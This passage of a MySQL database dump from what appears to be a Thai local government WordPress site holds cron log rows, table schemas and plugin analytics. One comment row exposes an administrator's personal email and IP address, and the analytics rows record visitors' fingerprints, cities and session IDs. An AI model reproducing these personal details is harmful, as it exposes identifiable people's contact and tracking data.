(91613,31018,'action complete via WP Cron','2025-09-24 07:37:24','2025-09-24 07:37:24'),
(91614,31020,'action created','2025-09-24 07:37:24','2025-09-24 07:37:24'),
(91615,31019,'action started via WP Cron','2025-09-24 07:37:24','2025-09-24 07:37:24'),
(91616,31019,'action complete via WP Cron','2025-09-24 07:37:24','2025-09-24 07:37:24'),
(91617,31021,'action created','2025-09-24 07:37:24','2025-09-24 07:37:24'),
(91618,31008,'action started via WP Cron','2025-09-24 07:37:24','2025-09-24 07:37:24'),
(91619,31008,'action complete via WP Cron','2025-09-24 07:37:24','2025-09-24 07:37:24'),
(91620,31022,'action created','2025-09-24 07:37:24','2025-09-24 07:37:24'),
(91621,31020,'action started via WP Cron','2025-09-24 07:42:05','2025-09-24 07:42:05'),
(91622,31020,'action complete via WP Cron','2025-09-24 07:42:05','2025-09-24 07:42:05'),
(91623,31023,'action created','2025-09-24 07:42:05','2025-09-24 07:42:05'),
(91624,31021,'action started via WP Cron','2025-09-24 07:42:05','2025-09-24 07:42:05'),
(91625,31021,'action complete via WP Cron','2025-09-24 07:42:05','2025-09-24 07:42:05'),
(91626,31024,'action created','2025-09-24 07:42:05','2025-09-24 07:42:05'),
(91627,31023,'action started via WP Cron','2025-09-24 07:51:05','2025-09-24 07:51:05'),
(91628,31023,'action complete via WP Cron','2025-09-24 07:51:05','2025-09-24 07:51:05'),
(91629,31025,'action created','2025-09-24 07:51:05','2025-09-24 07:51:05'),
(91630,31024,'action started via WP Cron','2025-09-24 07:51:05','2025-09-24 07:51:05'),
(91631,31024,'action complete via WP Cron','2025-09-24 07:51:05','2025-09-24 07:51:05'),
(91632,31026,'action created','2025-09-24 07:51:05','2025-09-24 07:51:05'),
(91633,31025,'action started via WP Cron','2025-09-24 07:54:05','2025-09-24 07:54:05'),
(91634,31025,'action complete via WP Cron','2025-09-24 07:54:05','2025-09-24 07:54:05'),
(91635,31027,'action created','2025-09-24 07:54:06','2025-09-24 07:54:06'),
(91636,31026,'action started via WP Cron','2025-09-24 07:54:06','2025-09-24 07:54:06'),
(91637,31026,'action complete via WP Cron','2025-09-24 07:54:06','2025-09-24 07:54:06'),
(91638,31028,'action created','2025-09-24 07:54:06','2025-09-24 07:54:06'),
(91639,31027,'action started via WP Cron','2025-09-24 07:55:42','2025-09-24 07:55:42'),
(91640,31027,'action complete via WP Cron','2025-09-24 07:55:42','2025-09-24 07:55:42'),
(91641,31029,'action created','2025-09-24 07:55:42','2025-09-24 07:55:42'),
(91642,31028,'action started via WP Cron','2025-09-24 07:55:42','2025-09-24 07:55:42'),
(91643,31028,'action complete via WP Cron','2025-09-24 07:55:42','2025-09-24 07:55:42'),
(91644,31030,'action created','2025-09-24 07:55:42','2025-09-24 07:55:42'),
(91645,31029,'action started via WP Cron','2025-09-24 07:56:43','2025-09-24 07:56:43'),
(91646,31029,'action complete via WP Cron','2025-09-24 07:56:43','2025-09-24 07:56:43'),
(91647,31031,'action created','2025-09-24 07:56:43','2025-09-24 07:56:43'),
(91648,31030,'action started via WP Cron','2025-09-24 07:56:43','2025-09-24 07:56:43'),
(91649,31030,'action complete via WP Cron','2025-09-24 07:56:43','2025-09-24 07:56:43'),
(91650,31032,'action created','2025-09-24 07:56:43','2025-09-24 07:56:43'),
(91651,31031,'action started via WP Cron','2025-09-24 07:58:41','2025-09-24 07:58:41'),
(91652,31031,'action complete via WP Cron','2025-09-24 07:58:41','2025-09-24 07:58:41'),
(91653,31033,'action created','2025-09-24 07:58:41','2025-09-24 07:58:41'),
(91654,31032,'action started via WP Cron','2025-09-24 07:58:41','2025-09-24 07:58:41'),
(91655,31032,'action complete via WP Cron','2025-09-24 07:58:41','2025-09-24 07:58:41'),
(91656,31034,'action created','2025-09-24 07:58:41','2025-09-24 07:58:41'),
(91657,31033,'action started via WP Cron','2025-09-24 07:59:43','2025-09-24 07:59:43'),
(91658,31033,'action complete via WP Cron','2025-09-24 07:59:43','2025-09-24 07:59:43'),
(91659,31035,'action created','2025-09-24 07:59:43','2025-09-24 07:59:43'),
(91660,31034,'action started via WP Cron','2025-09-24 07:59:43','2025-09-24 07:59:43'),
(91661,31034,'action complete via WP Cron','2025-09-24 07:59:43','2025-09-24 07:59:43'),
(91662,31036,'action created','2025-09-24 07:59:43','2025-09-24 07:59:43'),
(91663,31035,'action started via WP Cron','2025-09-24 08:01:42','2025-09-24 08:01:42'),
(91664,31035,'action complete via WP Cron','2025-09-24 08:01:42','2025-09-24 08:01:42'),
(91665,31037,'action created','2025-09-24 08:01:42','2025-09-24 08:01:42'),
(91666,31036,'action started via WP Cron','2025-09-24 08:01:42','2025-09-24 08:01:42'),
(91667,31036,'action complete via WP Cron','2025-09-24 08:01:42','2025-09-24 08:01:42'),
(91668,31038,'action created','2025-09-24 08:01:42','2025-09-24 08:01:42'),
(91669,31037,'action started via WP Cron','2025-09-24 08:03:43','2025-09-24 08:03:43'),
(91670,31037,'action complete via WP Cron','2025-09-24 08:03:43','2025-09-24 08:03:43'),
(91671,31039,'action created','2025-09-24 08:03:43','2025-09-24 08:03:43'),
(91672,31038,'action started via WP Cron','2025-09-24 08:03:43','2025-09-24 08:03:43'),
(91673,31038,'action complete via WP Cron','2025-09-24 08:03:43','2025-09-24 08:03:43'),
(91674,31040,'action created','2025-09-24 08:03:43','2025-09-24 08:03:43'),
(91675,31039,'action started via WP Cron','2025-09-24 08:05:42','2025-09-24 08:05:42'),
(91676,31039,'action complete via WP Cron','2025-09-24 08:05:42','2025-09-24 08:05:42'),
(91677,31041,'action created','2025-09-24 08:05:42','2025-09-24 08:05:42'),
(91678,31040,'action started via WP Cron','2025-09-24 08:05:42','2025-09-24 08:05:42'),
(91679,31040,'action complete via WP Cron','2025-09-24 08:05:42','2025-09-24 08:05:42'),
(91680,31042,'action created','2025-09-24 08:05:42','2025-09-24 08:05:42'),
(91681,31041,'action started via WP Cron','2025-09-24 08:06:43','2025-09-24 08:06:43'),
(91682,31041,'action complete via WP Cron','2025-09-24 08:06:43','2025-09-24 08:06:43'),
(91683,31043,'action created','2025-09-24 08:06:43','2025-09-24 08:06:43'),
(91684,31042,'action started via WP Cron','2025-09-24 08:06:43','2025-09-24 08:06:43'),
(91685,31042,'action complete via WP Cron','2025-09-24 08:06:43','2025-09-24 08:06:43'),
(91686,31044,'action created','2025-09-24 08:06:43','2025-09-24 08:06:43'),
(91687,31043,'action started via WP Cron','2025-09-24 08:08:42','2025-09-24 08:08:42'),
(91688,31043,'action complete via WP Cron','2025-09-24 08:08:42','2025-09-24 08:08:42'),
(91689,31045,'action created','2025-09-24 08:08:42','2025-09-24 08:08:42'),
(91690,31044,'action started via WP Cron','2025-09-24 08:08:42','2025-09-24 08:08:42'),
(91691,31044,'action complete via WP Cron','2025-09-24 08:08:42','2025-09-24 08:08:42'),
(91692,31046,'action created','2025-09-24 08:08:42','2025-09-24 08:08:42'),
(91693,31045,'action started via WP Cron','2025-09-24 08:10:41','2025-09-24 08:10:41'),
(91694,31045,'action complete via WP Cron','2025-09-24 08:10:41','2025-09-24 08:10:41'),
(91695,31047,'action created','2025-09-24 08:10:41','2025-09-24 08:10:41'),
(91696,31046,'action started via WP Cron','2025-09-24 08:10:41','2025-09-24 08:10:41'),
(91697,31046,'action complete via WP Cron','2025-09-24 08:10:41','2025-09-24 08:10:41'),
(91698,31048,'action created','2025-09-24 08:10:41','2025-09-24 08:10:41'),
(91699,31047,'action started via WP Cron','2025-09-24 08:11:42','2025-09-24 08:11:42'),
(91700,31047,'action complete via WP Cron','2025-09-24 08:11:42','2025-09-24 08:11:42'),
(91701,31049,'action created','2025-09-24 08:11:42','2025-09-24 08:11:42'),
(91702,31048,'action started via WP Cron','2025-09-24 08:11:42','2025-09-24 08:11:42'),
(91703,31048,'action complete via WP Cron','2025-09-24 08:11:42','2025-09-24 08:11:42'),
(91704,31050,'action created','2025-09-24 08:11:42','2025-09-24 08:11:42');
/*!40000 ALTER TABLE `wp_actionscheduler_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_commentmeta`
--

DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_commentmeta`
--

LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_comments`
--

DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_comments`
--

LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
INSERT INTO `wp_comments` VALUES
(2,330,'admin','patcharapol@ro.ac.th','http://pakhaeng.ssk.in.th','1.20.162.38','2024-08-01 10:12:39','2024-08-01 03:12:39','ทดสอบ',0,'1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36','comment',0,1);
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_e_events`
--

DROP TABLE IF EXISTS `wp_e_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_e_events` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `event_data` text DEFAULT NULL,
  `created_at` datetime NOT NULL,
  PRIMARY KEY (`id`),
  KEY `created_at_index` (`created_at`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_e_events`
--

LOCK TABLES `wp_e_events` WRITE;
/*!40000 ALTER TABLE `wp_e_events` DISABLE KEYS */;
INSERT INTO `wp_e_events` VALUES
(1,'{\"event\":\"modal load\",\"version\":\"\",\"details\":\"{\\\"placement\\\":\\\"Onboarding wizard\\\",\\\"step\\\":\\\"account\\\",\\\"user_state\\\":\\\"anon\\\"}\",\"ts\":\"2025-07-01T14:13:41.556-07:00\"}','2025-07-01 14:13:41');
/*!40000 ALTER TABLE `wp_e_events` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_embedpress_analytics_browser_info`
--

DROP TABLE IF EXISTS `wp_embedpress_analytics_browser_info`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_embedpress_analytics_browser_info` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` varchar(255) DEFAULT NULL,
  `session_id` varchar(255) NOT NULL,
  `browser_fingerprint` varchar(64) DEFAULT NULL,
  `browser_name` varchar(100) DEFAULT NULL,
  `browser_version` varchar(50) DEFAULT NULL,
  `operating_system` varchar(100) DEFAULT NULL,
  `device_type` enum('desktop','mobile','tablet','unknown') DEFAULT 'unknown',
  `screen_resolution` varchar(20) DEFAULT NULL,
  `language` varchar(10) DEFAULT NULL,
  `timezone` varchar(50) DEFAULT NULL,
  `country` varchar(100) DEFAULT NULL,
  `city` varchar(100) DEFAULT NULL,
  `user_agent` text DEFAULT NULL,
  `created_at` datetime DEFAULT current_timestamp(),
  PRIMARY KEY (`id`),
  UNIQUE KEY `unique_user_fingerprint` (`user_id`,`browser_fingerprint`),
  KEY `idx_user_id` (`user_id`),
  KEY `idx_session_id` (`session_id`),
  KEY `idx_browser_fingerprint` (`browser_fingerprint`),
  KEY `idx_browser_name` (`browser_name`),
  KEY `idx_operating_system` (`operating_system`),
  KEY `idx_device_type` (`device_type`),
  KEY `idx_country` (`country`),
  KEY `idx_created_at` (`created_at`)
) ENGINE=InnoDB AUTO_INCREMENT=29 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_embedpress_analytics_browser_info`
--

LOCK TABLES `wp_embedpress_analytics_browser_info` WRITE;
/*!40000 ALTER TABLE `wp_embedpress_analytics_browser_info` DISABLE KEYS */;
INSERT INTO `wp_embedpress_analytics_browser_info` VALUES
(1,'0','ep-user-1758520476898-mf7z9mbqdvc','0f68169c','Chrome','140.0.0.0','Windows 10','desktop','1280x720','th','Asia/Bangkok','TH','Khon Sawan','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36','2025-09-22 13:16:56'),
(2,'0','ep-user-1758523426393-20uz09wmrre','2b88475c','Safari','26.0','macOS','mobile','375x812','th-TH','Asia/Bangkok','TH','Ratchathewi','Mozilla/5.0 (iPhone; CPU iPhone OS 18_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Mobile/15E148 Safari/604.1','2025-09-22 14:06:08'),
(3,'0','ep-user-1758555001516-m9oqrzp012','47b7db98','Safari','18.6','macOS','desktop','820x1180','th-TH','Asia/Bangkok','TH','Bangkok','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Safari/605.1.15','2025-09-22 22:52:30'),
(4,'0','ep-user-1758499200022-ixkzpou2uwg','7fc09ede','Chrome','139.0.7258.127','Android','mobile','412x732','en-US','America/Los_Angeles',NULL,NULL,'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','2025-09-23 03:59:52'),
(5,'0','ep-user-1758499200013-zse3f2nh3yj','6965d30c','Chrome','139.0.7258.127','Android','mobile','412x732','en-US','America/Los_Angeles',NULL,NULL,'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','2025-09-23 05:59:34'),
(6,'0','ep-user-1758585600045-thkothhhej8','31c458a9','Chrome','139.0.7258.127','Android','mobile','412x732','en-US','America/Los_Angeles',NULL,NULL,'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','2025-09-23 07:33:13'),
(7,'0','ep-user-1758602392349-f43w8ixl8jt','20315786','Chrome','140.0.0.0','Linux','desktop','1920x1080','th','Asia/Bangkok','TH','Bangkok','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36','2025-09-23 12:02:19'),
(8,'0','ep-user-1758629442184-y45r0qri8cs','5f20d571','Chrome','138.0.0.0','Android','mobile','360x800','th','Asia/Bangkok','TH','Bangkok','Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36','2025-09-23 19:33:09'),
(9,'0','ep-user-1758629444372-gu3cvyskoi7','50c69655','Chrome','138.0.0.0','Android','mobile','400x400','en-US','America/Los_Angeles',NULL,NULL,'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)','2025-09-23 19:33:23'),
(10,'0','ep-user-1758636266679-4qpfhr1qevs','25510f4e','Chrome','136.0.0.0','Unknown','desktop','800x600','en-US','America/Los_Angeles','US','Moses Lake','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36','2025-09-23 21:26:58'),
(12,'0','ep-user-1758641400702-ttptfj2a9ti','2b9e77bc','Chrome','139.0.0.0','macOS','desktop','1440x900','th-TH','Asia/Bangkok','TH','Bangkok','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36','2025-09-23 22:52:31'),
(15,'0','ep-user-1758681630535-1fmd0s6na2k','079b3f12','Chrome','138.0.0.0','macOS','desktop','1440x900','th-TH','Asia/Bangkok','TH','Bangkok','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36','2025-09-24 10:03:03'),
(16,'0','ep-user-1758686234951-6ga713dl1zu','05c46d13','Chrome','140.0.0.0','macOS','desktop','1920x1080','en-US','Asia/Bangkok','TH','Bangkok','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36','2025-09-24 11:19:49'),
(17,'0','ep-user-1758689113634-1zlw7t824ix','407286ea','Chrome','140.0.0.0','Windows 10','desktop','1536x864','en-US','Asia/Bangkok','TH','Si Sa Ket','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0','2025-09-24 12:10:45'),
(18,'0','ep-user-1758690229030-tbtiunir0jd','33e9f489','Chrome','140.0.0.0','Windows 10','desktop','1536x864','th-TH','Asia/Bangkok','TH','Bangkok','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36','2025-09-24 12:26:24'),
(19,'0','ep-user-1758686234951-6ga713dl1zu','613ad48a','Chrome','140.0.0.0','macOS','desktop','1440x900','en-US','Asia/Bangkok','TH','Bangkok','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36','2025-09-24 12:41:03'),
(20,'0','ep-user-1758691914299-c5xrdqo5kil','5734995a','Chrome','130.0.0.0','Android','mobile','360x800','th-TH','Asia/Bangkok','TH','Nam Kliang','Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/28.0 Chrome/130.0.0.0 Mobile Safari/537.36','2025-09-24 12:54:27'),
(21,'0','ep-user-1758672000043-zse3f2nh3yj','4099e7ce','Chrome','139.0.7258.127','Android','mobile','412x732','en-US','America/Los_Angeles',NULL,NULL,'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','2025-09-24 13:58:19'),
(22,'0','ep-user-1758672000023-zse3f2nh3yj','6854c930','Chrome','139.0.7258.127','Android','mobile','412x732','en-US','America/Los_Angeles',NULL,NULL,'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','2025-09-24 14:01:14'),
(23,'0','ep-user-1758672000014-zse3f2nh3yj','687ebeb0','Chrome','139.0.7258.127','Android','mobile','412x732','en-US','America/Los_Angeles',NULL,NULL,'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','2025-09-24 14:30:28'),
(25,'0','ep-user-1758672000014-zse3f2nh3yj','67644271','Chrome','139.0.7258.127','Android','mobile','412x732','en-US','America/Los_Angeles','US','The Dalles','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','2025-09-24 14:37:36'),
(26,'0','ep-user-1758698121246-thkothhhej8','6a95fe4e','Chrome','139.0.7258.127','Android','mobile','412x732','en-US','America/Los_Angeles',NULL,NULL,'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','2025-09-24 14:38:10'),
(27,'0','ep-user-1758698121238-thkothhhej8','59035aa4','Chrome','139.0.7258.127','Unknown','desktop','1024x1024','en-US','America/Los_Angeles',NULL,NULL,'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/139.0.7258.127 Safari/537.36','2025-09-24 14:38:11');
/*!40000 ALTER TABLE `wp_embedpress_analytics_browser_info` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_embedpress_analytics_content`
--

DROP TABLE IF EXISTS `wp_embedpress_analytics_content`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_embedpress_analytics_content` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `content_id` varchar(255) NOT NULL,
  `content_type` varchar(50) NOT NULL DEFAULT 'unknown',
  `embed_type` varchar(100) NOT NULL,
  `embed_url` text NOT NULL,
  `post_id` bigint(20) unsigned DEFAULT NULL,
  `page_url` text DEFAULT NULL,
  `title` varchar(500) DEFAULT NULL,
  `total_views` bigint(20) unsigned DEFAULT 0,
  `total_impressions` bigint(20) unsigned DEFAULT 0,
  `total_clicks` bigint(20) unsigned DEFAULT 0,
  `created_at` datetime DEFAULT current_timestamp(),
  `updated_at` datetime DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  PRIMARY KEY (`id`),
  UNIQUE KEY `unique_page_embed` (`page_url`(255),`embed_type`),
  KEY `idx_content_type` (`content_type`),
  KEY `idx_embed_type` (`embed_type`),
  KEY `idx_post_id` (`post_id`),
  KEY `idx_created_at` (`created_at`),
  KEY `idx_total_views` (`total_views`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_embedpress_analytics_content`
--

LOCK TABLES `wp_embedpress_analytics_content` WRITE;
/*!40000 ALTER TABLE `wp_embedpress_analytics_content` DISABLE KEYS */;
INSERT INTO `wp_embedpress_analytics_content` VALUES
(1,'8de74c13bc11e35f73c82d924e177d01','elementor','Google Docs','https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?usp=sharing&ouid=116408890257525538205&rtpof=true&sd=true',1558,'http://pakhaeng.ssk.in.th/?page_id=1558','รานการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ.2568',0,0,0,'2025-09-23 00:41:13','2025-09-23 15:10:27');
/*!40000 ALTER TABLE `wp_embedpress_analytics_content` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_embedpress_analytics_milestones`
--

DROP TABLE IF EXISTS `wp_embedpress_analytics_milestones`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_embedpress_analytics_milestones` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `milestone_type` enum('total_views','total_embeds','daily_views','monthly_views') NOT NULL,
  `milestone_value` bigint(20) unsigned NOT NULL,
  `achieved_value` bigint(20) unsigned NOT NULL,
  `is_notified` tinyint(1) DEFAULT 0,
  `achieved_at` datetime DEFAULT current_timestamp(),
  `notified_at` datetime DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_milestone_type` (`milestone_type`),
  KEY `idx_milestone_value` (`milestone_value`),
  KEY `idx_is_notified` (`is_notified`),
  KEY `idx_achieved_at` (`achieved_at`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_embedpress_analytics_milestones`
--

LOCK TABLES `wp_embedpress_analytics_milestones` WRITE;
/*!40000 ALTER TABLE `wp_embedpress_analytics_milestones` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_embedpress_analytics_milestones` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_embedpress_analytics_referrers`
--

DROP TABLE IF EXISTS `wp_embedpress_analytics_referrers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_embedpress_analytics_referrers` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `referrer_url` text NOT NULL,
  `referrer_domain` varchar(255) NOT NULL,
  `referrer_source` varchar(100) DEFAULT NULL,
  `utm_source` varchar(100) DEFAULT NULL,
  `utm_medium` varchar(100) DEFAULT NULL,
  `utm_campaign` varchar(255) DEFAULT NULL,
  `utm_term` varchar(255) DEFAULT NULL,
  `utm_content` varchar(255) DEFAULT NULL,
  `total_views` bigint(20) unsigned DEFAULT 0,
  `total_clicks` bigint(20) unsigned DEFAULT 0,
  `unique_visitors` bigint(20) unsigned DEFAULT 0,
  `first_visit` datetime DEFAULT current_timestamp(),
  `last_visit` datetime DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `created_at` datetime DEFAULT current_timestamp(),
  `updated_at` datetime DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  PRIMARY KEY (`id`),
  UNIQUE KEY `unique_referrer_url` (`referrer_url`(255)),
  KEY `idx_referrer_domain` (`referrer_domain`),
  KEY `idx_referrer_source` (`referrer_source`),
  KEY `idx_utm_source` (`utm_source`),
  KEY `idx_utm_medium` (`utm_medium`),
  KEY `idx_utm_campaign` (`utm_campaign`),
  KEY `idx_total_views` (`total_views`),
  KEY `idx_total_clicks` (`total_clicks`),
  KEY `idx_unique_visitors` (`unique_visitors`),
  KEY `idx_first_visit` (`first_visit`),
  KEY `idx_last_visit` (`last_visit`),
  KEY `idx_created_at` (`created_at`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_embedpress_analytics_referrers`
--

LOCK TABLES `wp_embedpress_analytics_referrers` WRITE;
/*!40000 ALTER TABLE `wp_embedpress_analytics_referrers` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_embedpress_analytics_referrers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_embedpress_analytics_views`
--

DROP TABLE IF EXISTS `wp_embedpress_analytics_views`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_embedpress_analytics_views` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `content_id` varchar(255) NOT NULL,
  `user_id` varchar(255) DEFAULT NULL,
  `session_id` varchar(255) NOT NULL,
  `user_ip` varchar(45) DEFAULT NULL,
  `user_agent` text DEFAULT NULL,
  `referrer_url` text DEFAULT NULL,
  `page_url` text DEFAULT NULL,
